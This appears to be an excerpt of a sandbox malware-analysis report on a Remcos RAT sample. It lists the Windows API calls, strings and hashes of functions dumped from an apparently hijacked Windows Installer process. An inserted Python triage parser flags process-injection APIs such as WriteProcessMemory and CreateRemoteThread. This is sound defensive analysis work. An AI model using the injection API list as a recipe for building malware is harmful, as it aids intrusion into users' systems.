• Instruction Fuzzy Hash: 8B515EB190061CEBDB209B61DD89FBA77BAFB04344F0541A5F749A2160EF728E85DF90
                                                                                                                                APIs
                                                                                                                                • memset.MSVCRT ref: 001F5CAD
                                                                                                                                • GetACP.KERNEL32(00000641,?,00000000), ref: 001F5CE3
                                                                                                                                • LoadLibraryW.KERNEL32(KERNEL32), ref: 001F5CF0
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 001F5D02
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,0000000A), ref: 001F5D38
                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 001F5D46
                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000641,?,?,00000401,00000000), ref: 001F5D6C
                                                                                                                                • memset.MSVCRT ref: 001F5DEE
                                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 001F5E07
                                                                                                                                  • Part of subcall function 001F2E35: _vsnwprintf.MSVCRT ref: 001F2E67
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 001F5E96
                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,00000000), ref: 001F5EB4
                                                                                                                                • WriteFile.KERNEL32(001F2638,00000004,?,00000000), ref: 001F5ECF
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: FileLibraryWritememset$AddressFormatFreeInfoLoadLocaleMessageProcVersion_vsnwprintflstrlen
• String ID: GetUserDefaultUILanguage$Install error %i$KERNEL32
• API String ID: 2411759445-2065445882
APIs
• GetCurrentThread.KERNEL32 ref: 001F2FC1
• OpenThreadToken.ADVAPI32(00000000), ref: 001F2FC8
• GetLastError.KERNEL32 ref: 001F2FD2
• GetCurrentProcess.KERNEL32(00000028,?), ref: 001F2FE9
• OpenProcessToken.ADVAPI32(00000000), ref: 001F2FF0
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001F300F
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000030,?,?), ref: 001F303B
• CloseHandle.KERNEL32(?), ref: 001F3044
• GetLastError.KERNEL32 ref: 001F304A
• CloseHandle.KERNEL32(?), ref: 001F3068
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: Token$CloseCurrentErrorHandleLastOpenProcessThread$AdjustLookupPrivilegePrivilegesValue
• String ID:
• API String ID: 268630328-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 001F3133
• GetLastError.KERNEL32(?,?), ref: 001F313D
• GetLengthSid.ADVAPI32(?,?,?), ref: 001F3148
• FreeSid.ADVAPI32(00000000), ref: 001F315E
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: AllocateErrorFreeInitializeLastLength
• String ID:
• API String ID: 1611457584-0
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F9E62
• GetCurrentProcessId.KERNEL32 ref: 001F9E71
• GetCurrentThreadId.KERNEL32 ref: 001F9E7A
• GetTickCount.KERNEL32 ref: 001F9E83
• QueryPerformanceCounter.KERNEL32(?), ref: 001F9E98
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
APIs
• StartServiceCtrlDispatcherW.ADVAPI32(?), ref: 001F7DF2
• GetLastError.KERNEL32 ref: 001F7DFC
  • Part of subcall function 001F59F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 001F5A12
  • Part of subcall function 001F59F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 001F5A8A
  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5AAA
  • Part of subcall function 001F59F2: GlobalFree.KERNEL32(?), ref: 001F5ABF
  • Part of subcall function 001F59F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 001F5B14
  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 001F5B35
  • Part of subcall function 001F59F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 001F5B3C
  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 001F5B59
  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5B65
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: Value$CloseErrorLast$CreateCtrlDispatcherFreeGlobalQueryServiceStartlstrlen
• String ID: MSIServer$StartServiceCtrlDispatcher failed.
• API String ID: 2998827721-520530687
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,001F9726,001F1000), ref: 001F95F7
• UnhandledExceptionFilter.KERNEL32(001F9726,?,001F9726,001F1000), ref: 001F9600
• GetCurrentProcess.KERNEL32(C0000409,?,001F9726,001F1000), ref: 001F960B
• TerminateProcess.KERNEL32(00000000,?,001F9726,001F1000), ref: 001F9612
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(001F9BC0), ref: 001F9C15
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
  • Part of subcall function 001F3C24: EnterCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3C31
  • Part of subcall function 001F3C24: LeaveCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3CDF
• RegOpenKeyExW.ADVAPI32(80000000,CLSID,00000000,00020019,?,00000002,00000000,00007530), ref: 001F7EFB
• RegCloseKey.ADVAPI32(?), ref: 001F7F0B
  • Part of subcall function 001F8745: GlobalAlloc.KERNEL32(00000000,?,00000000,?,001F7F98,00000200), ref: 001F875F
  • Part of subcall function 001F8745: memset.MSVCRT ref: 001F8778
• CoUninitialize.OLE32 ref: 001F7F5B
• MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000200), ref: 001F8058
• CoUninitialize.OLE32 ref: 001F8066
• GetLastError.KERNEL32 ref: 001F806C
• GetLastError.KERNEL32(00000000), ref: 001F80AC
• CoUninitialize.OLE32(00000002,00000000,00007530), ref: 001F80C2
• InitializeCriticalSection.KERNEL32(001FC488,00000002,00000000,00007530), ref: 001F81D2
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 001F81F5
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 001F8204
• GetLastError.KERNEL32 ref: 001F8246
• GetLastError.KERNEL32 ref: 001F8276
• CoRegisterClassObject.OLE32(001F25E0,?,00000015,00000001,?,00000002,00000000,00007530), ref: 001F82C0
• MsgWaitForMultipleObjects.USER32(00000003,?,00000000,000000FF,00001CFF), ref: 001F8343
• TranslateMessage.USER32(?), ref: 001F8375
• DispatchMessageW.USER32(?), ref: 001F8382
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F8394
• GetLastError.KERNEL32 ref: 001F83C6
• GetLastError.KERNEL32 ref: 001F83CC
• GetLastError.KERNEL32(00000000), ref: 001F841B
• EnterCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F843C
                                                                                                                                • CloseHandle.KERNEL32 ref: 001F8448
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC488), ref: 001F8459
                                                                                                                                • EnterCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F846C
                                                                                                                                • CloseHandle.KERNEL32 ref: 001F8478
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC488), ref: 001F8489
                                                                                                                                • EnterCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F849C
                                                                                                                                • CloseHandle.KERNEL32 ref: 001F84A8
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC488), ref: 001F84B9
                                                                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 001F84C3
                                                                                                                                • DeleteCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F84E0
                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,00000200), ref: 001F84EC
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F850D
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F8526
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F853F
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F8558
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F8571
                                                                                                                                Strings
                                                                                                                                • ServiceThreadMain: Class registration failed, xrefs: 001F8400
                                                                                                                                • ServiceThreadMain: CreateWaitableTimer failed., xrefs: 001F824C
                                                                                                                                • ServiceThreadMain: CoInitializeSecurity failed, xrefs: 001F80A0
                                                                                                                                • CLSID, xrefs: 001F7EF1
                                                                                                                                • ServiceThreadMain: CreateSD for CreateWaitableTimer failed., xrefs: 001F81B1
                                                                                                                                • ServiceThreadMain: CreateEvent failed., xrefs: 001F840D
                                                                                                                                • Wait Failed in MsgWait., xrefs: 001F83D4
                                                                                                                                • CoCreateInstance of CLSID_GlobalOptions failed., xrefs: 001F8105
                                                                                                                                • ServiceThreadMain: SetWaitableTimer failed., xrefs: 001F827C
                                                                                                                                • Set of COMGLB_UNMARSHALING_POLICY failed., xrefs: 001F8163
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$ErrorLast$Global$FreeUninitialize$CloseEnterLeave$HandleMessage$CreateEvent$AbsoluteAllocClassDeleteDispatchInitializeMakeMultipleObjectObjectsOpenPeekRegisterTranslateWaitmemset
                                                                                                                                • String ID: CLSID$CoCreateInstance of CLSID_GlobalOptions failed.$ServiceThreadMain: Class registration failed$ServiceThreadMain: CoInitializeSecurity failed$ServiceThreadMain: CreateEvent failed.$ServiceThreadMain: CreateSD for CreateWaitableTimer failed.$ServiceThreadMain: CreateWaitableTimer failed.$ServiceThreadMain: SetWaitableTimer failed.$Set of COMGLB_UNMARSHALING_POLICY failed.$Wait Failed in MsgWait.
                                                                                                                                • API String ID: 535215923-1806920385
                                                                                                                                • Opcode ID: cfe1e5e5a682a501a6b0e532757ccecb2aae23fb7af044d076cf7abde2831a82
                                                                                                                                • Instruction ID: 94d62e281e8647f3c78ac1a1d79687c520458c1882cbfdc9e86147d209a181fa
                                                                                                                                • Opcode Fuzzy Hash: cfe1e5e5a682a501a6b0e532757ccecb2aae23fb7af044d076cf7abde2831a82
                                                                                                                                • Instruction Fuzzy Hash: 7A028070A0022DAFEB249B64ED89FBA77B9FB44704F004199B709A65A0DF709D85DF60
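The per-function listings in this section are machine-generated, so the useful editorial work is to make them queryable: aggregate which APIs each dumped function calls, pull out the referenced strings, and separate host-process code from the injected payload. Several records here carry Windows Installer service internals (RegisterServiceCtrlHandlerW with the service name MSIServer, the Software\Microsoft\Windows\CurrentVersion\Installer\CA key, the ISMIF32.DLL/InstallStatusMIF status-reporting import), and none of them call the thread-injection or foreign-memory APIs that the report's behaviour signatures refer to, so a triage script should not treat this region of process 9 as the Remcos code itself. The parser below is an added example by the editor, not Joe Sandbox's code and not part of the report; the line grammar (bullet, `Name.MODULE(args), ref: addr`, `string, xrefs: addr`, `Key: value`) is inferred from the lines visible on this page and is an assumption, as are the indicator and host-marker lists. The sample text is an abridged copy of listing lines from this section.

```python
"""Parse Joe Sandbox-style per-function API listings for triage.

Added example, not Joe Sandbox code: the line grammar is inferred from the
report lines visible on this page (assumption) and may not cover every
variant the real report emits.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# "• Name.MODULE(arg,...), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function XXXX:". Args are matched greedily so
# nested parentheses inside string arguments do not break the match.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)"
    r"(?:\((?P<args>.*)\),?)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STR_RE = re.compile(r"^\s*•\s*(?P<s>.*?),\s*xrefs:\s*(?P<xref>[0-9A-Fa-f]+)\s*$")
META_RE = re.compile(r"^\s*•\s*(?P<k>[^:]+):\s*(?P<v>.*?)\s*$")
LIST_SECTIONS = {"APIs", "Strings"}

# Well-known injection APIs behind signatures such as "Queues an APC in another
# process" and "Writes to foreign memory regions" (editor's list, assumption).
INJECTION_APIS = {
    "VirtualAllocEx", "WriteProcessMemory", "NtWriteVirtualMemory",
    "CreateRemoteThread", "QueueUserAPC", "NtQueueApcThread",
    "SetThreadContext", "NtMapViewOfSection", "ResumeThread",
}
# Windows Installer service internals: service name, custom-action registry
# key, MIF status DLL. Marker list chosen by the editor (assumption).
HOST_MARKERS = ("MSIServer", r"Installer\CA", "ISMIF32.DLL")


@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: str
    subcall: Optional[str]  # callee address when the line is "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)
    closed: bool = False  # set once a non-list section (Memory Dump Source, ...) is seen

    def api_names(self, include_subcalls: bool = False) -> list:
        return [c.api for c in self.calls if include_subcalls or c.subcall is None]


def parse_listing(text: str) -> list:
    """Split the listing into one FunctionRecord per APIs/Strings...Similarity group."""
    records, cur, section = [], None, "APIs"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):  # section header
            if line in LIST_SECTIONS:
                if cur is None or cur.closed:  # a new function starts here
                    cur = FunctionRecord()
                    records.append(cur)
            elif cur is not None:
                cur.closed = True
            section = line
            continue
        if cur is None:  # listing cut off mid-record, as at the top of this page
            cur = FunctionRecord()
            records.append(cur)
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.calls.append(ApiCall(m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                cur.strings.append(m["s"])
        else:
            m = META_RE.match(line)
            if m:
                cur.meta[m["k"]] = m["v"]
    return records


def injection_indicators(rec: FunctionRecord) -> set:
    return {c.api for c in rec.calls if c.api in INJECTION_APIS}


def host_markers(rec: FunctionRecord) -> set:
    blob = " ".join([c.args for c in rec.calls] + rec.strings)
    return {m for m in HOST_MARKERS if m in blob}


def api_histogram(records) -> Counter:
    return Counter(a for r in records for a in r.api_names(include_subcalls=True))


# Abridged copy of listing lines from this section (constructed sample input).
SAMPLE = """
APIs
  • Part of subcall function 001F8745: GlobalAlloc.KERNEL32(00000000,?,00000000,?,001F7F98,00000200), ref: 001F875F
  • Part of subcall function 001F8745: memset.MSVCRT ref: 001F8778
• CoUninitialize.OLE32 ref: 001F7F5B
• MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000200), ref: 001F8058
• GetLastError.KERNEL32 ref: 001F806C
• GetLastError.KERNEL32(00000000), ref: 001F80AC
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 001F81F5
• CoRegisterClassObject.OLE32(001F25E0,?,00000015,00000001,?,00000002,00000000,00007530), ref: 001F82C0
• MsgWaitForMultipleObjects.USER32(00000003,?,00000000,000000FF,00001CFF), ref: 001F8343
Strings
• ServiceThreadMain: Class registration failed, xrefs: 001F8400
• CoCreateInstance of CLSID_GlobalOptions failed., xrefs: 001F8105
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• Opcode ID: cfe1e5e5a682a501a6b0e532757ccecb2aae23fb7af044d076cf7abde2831a82
APIs
• RegisterServiceCtrlHandlerW.ADVAPI32(MSIServer,Function_000085A0), ref: 001F7E2A
• GetLastError.KERNEL32 ref: 001F7E39
• CreateThread.KERNEL32(00000000,00000000,Function_00007EB0,00000000,00000000,001FC6A8), ref: 001F7E72
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_listing(SAMPLE)):
        print(f"function {i}: apis={rec.api_names()} "
              f"injection={injection_indicators(rec) or '-'} host={host_markers(rec) or '-'}")
```

Run against the full listing, the histogram shows which functions share the ErrorLast/CriticalSection-heavy profile of the host's service code, and an empty `injection_indicators` result for every record in a region is the cue to look for the payload in another dumped region rather than here.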
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(ISMIF32.DLL,00000000,00000800,?,00000000), ref: 001F57F6
                                                                                                                                • GetProcAddress.KERNEL32(00000000,InstallStatusMIF), ref: 001F580C
                                                                                                                                • GetSystemDefaultLangID.KERNEL32(?,00000000), ref: 001F585C
                                                                                                                                • memset.MSVCRT ref: 001F589D
                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000000,?,?,00000105,00000000,?,00000000), ref: 001F58C5
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,001FC920,00000100,00000000,00000000,?,00000000), ref: 001F5902
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 001F5976
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$AddressByteCharDefaultFormatFreeLangLoadMessageMultiProcSystemWidememset
                                                                                                                                • String ID: ISMIF32.DLL$InstallStatusMIF$Installer error %i
                                                                                                                                • API String ID: 2186023739-4237920443
                                                                                                                                • Opcode ID: 53174c408b0dd5d55e56b9a1170879be50ae5d958722c6d795c6cc1cf03d8722
                                                                                                                                • Instruction ID: 20ab9a4e3958bbb01ed896786ae6416a35ce4237d4edf57c65cef2c19b9b4efa
                                                                                                                                • Opcode Fuzzy Hash: 53174c408b0dd5d55e56b9a1170879be50ae5d958722c6d795c6cc1cf03d8722
                                                                                                                                • Instruction Fuzzy Hash: 7641077074031CBEE714AB249C4AFFA36AAFB14728F100165F75AE20D0DBE09D8096A4
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll,OLEAUT32.dll,0000005C,?,?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8F8C
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001F8F9F
                                                                                                                                • GetLastError.KERNEL32(?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8FAB
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8FE0
                                                                                                                                • SetLastError.KERNEL32(00000000,?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8FE7
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 001F8FF8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastLibrary$AddressDirectoryFreeLoadProcSystem
                                                                                                                                • String ID: GetSystemWow64DirectoryW$OLEAUT32.dll$kernel32.dll
                                                                                                                                • API String ID: 1648426049-138662608
                                                                                                                                • Opcode ID: 0761025849064eae0a2895eab78e4d9ed7569509660cc18ebf1bfc195dbab7bd
                                                                                                                                • Instruction ID: 1e63ca7f5855253d6f83f3023cdd9c079574ee19d93dbd0370bcb2c00a86c6ac
                                                                                                                                • Opcode Fuzzy Hash: 0761025849064eae0a2895eab78e4d9ed7569509660cc18ebf1bfc195dbab7bd
                                                                                                                                • Instruction Fuzzy Hash: 1C01D83670861A6FD7126B64BD0CA7F7A9BEB84351F160125F703D2650EFB0CC81D694
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32 ref: 001F5475
                                                                                                                                  • Part of subcall function 001F8665: GlobalAlloc.KERNEL32(00000040,?,00000020,-00000002,00000000,?,001F66E9,?,?,?), ref: 001F8680
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 001F54EB
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 001F54FF
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000008), ref: 001F5511
                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 001F551B
                                                                                                                                • SetThreadToken.ADVAPI32(00000000,00000000,?,00000000,00000008), ref: 001F5534
                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 001F553E
                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 001F5559
                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000008), ref: 001F5565
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000008), ref: 001F558D
                                                                                                                                • CoUninitialize.OLE32(?,00000000,00000008), ref: 001F5593
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$Library$AddressAllocCurrentDirectoryFreeGlobalInitializeLoadProcThreadTokenUninitializelstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1429436423-0
                                                                                                                                • Opcode ID: 02b03c1a95c0342472903a7a4e63f82ef736fba28adafc02e670a1ff0cea98d8
                                                                                                                                • Instruction ID: 06072fe9ed59410e2a56f423a84348c3d29a5ca718cec6e3ea1fbab27b7b06bd
                                                                                                                                • Opcode Fuzzy Hash: 02b03c1a95c0342472903a7a4e63f82ef736fba28adafc02e670a1ff0cea98d8
                                                                                                                                • Instruction Fuzzy Hash: BE412572A0093D5BC7315B289C487BE7277AF94751F020169EF46E7260EF30CD8186D0
                                                                                                                                Strings
                                                                                                                                • ResolveDelayLoadedAPI, xrefs: 001F9123
                                                                                                                                • ResolveDelayLoadsFromDll, xrefs: 001F9137
                                                                                                                                • KERNEL32.DLL, xrefs: 001F9113
                                                                                                                                • api-ms-win-core-delayload-l1-1-1.dll, xrefs: 001F9103
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: KERNEL32.DLL$ResolveDelayLoadedAPI$ResolveDelayLoadsFromDll$api-ms-win-core-delayload-l1-1-1.dll
                                                                                                                                • API String ID: 0-3594434003
                                                                                                                                • Opcode ID: e6e8a5e000c00221a1547e0edc94c7954b5de987ab69cc84c4a8dfe419856786
                                                                                                                                • Instruction ID: a09a1e4d88b1b8f32c4131a22fd3b942614dba0a344214f1327b70d997aac2fd
                                                                                                                                • Opcode Fuzzy Hash: e6e8a5e000c00221a1547e0edc94c7954b5de987ab69cc84c4a8dfe419856786
                                                                                                                                • Instruction Fuzzy Hash: 74F0E9B268663F678F317AE85CD2BBE66895A16BE13010275FB00E7154DB20CC81D6D0
                                                                                                                                APIs
                                                                                                                                • RegisterServiceCtrlHandlerW.ADVAPI32(MSIServer,Function_000085A0), ref: 001F7E2A
                                                                                                                                • GetLastError.KERNEL32 ref: 001F7E39
